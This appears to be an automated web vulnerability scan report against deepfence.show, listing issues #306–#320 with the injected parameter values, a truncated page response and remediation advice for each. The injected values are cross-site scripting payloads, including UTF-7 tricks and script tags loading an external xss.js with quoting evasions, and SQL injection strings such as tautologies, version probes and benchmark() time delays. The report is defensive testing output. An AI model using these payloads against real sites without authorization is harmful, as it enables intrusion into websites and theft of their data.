response\nCWE-ID CWE-79\nIssue Number #306\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"\ntext/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('\nXSS');+ADw-/SCRIPT+AD4-Response Content-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #307\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <SCRIPT a=\">\" SRC=\"http://soapui.org/xss.js\"></SCRIPT\n>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79Issue Number #308\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <SCRIPT =\">\" SRC=\"http://soapui.org/xss.js\"></SCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #309\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <SCRIPT a=\">\" '' SRC=\"http://soapui.org/xss.js\"></\nSCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #310\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <SCRIPT \"a='>'\" SRC=\"http://soapui.org/xss.js\"></SCRIPT\n>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #311\nScan Cross Site ScriptingSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <SCRIPT a=`>` SRC=\"http://soapui.org/xss.js\"></SCRIPT\n>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #312\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <SCRIPT a=\">'>\" SRC=\"http://soapui.org/xss.js\"></\nSCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #313\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"\nhttp://soapui.org/xss.js\"></SCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #314\nSQL Injection\nSQL Injection Scans work through a list of predefined strings that could be used to execute arbitrary \nSQL code in a database, and inserts those strings into the parameters of the request.\nIf an unexpected response is received, this is an indication that input validation has failed to remove the potentially malicious SQL strings from the parameters, and that data should be sanitized before it \nis used to construct SQL queries.\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io'-'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #315\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io and (select substring(@@version,2,1))='i'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #316\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 4--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #317\nSQL InjectionScan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io benchmark(50000000,MD5(1))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #318\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io' or ''&'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #319\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #320\nScan SQL Injection\nSeverity ERROR\nEndpoint 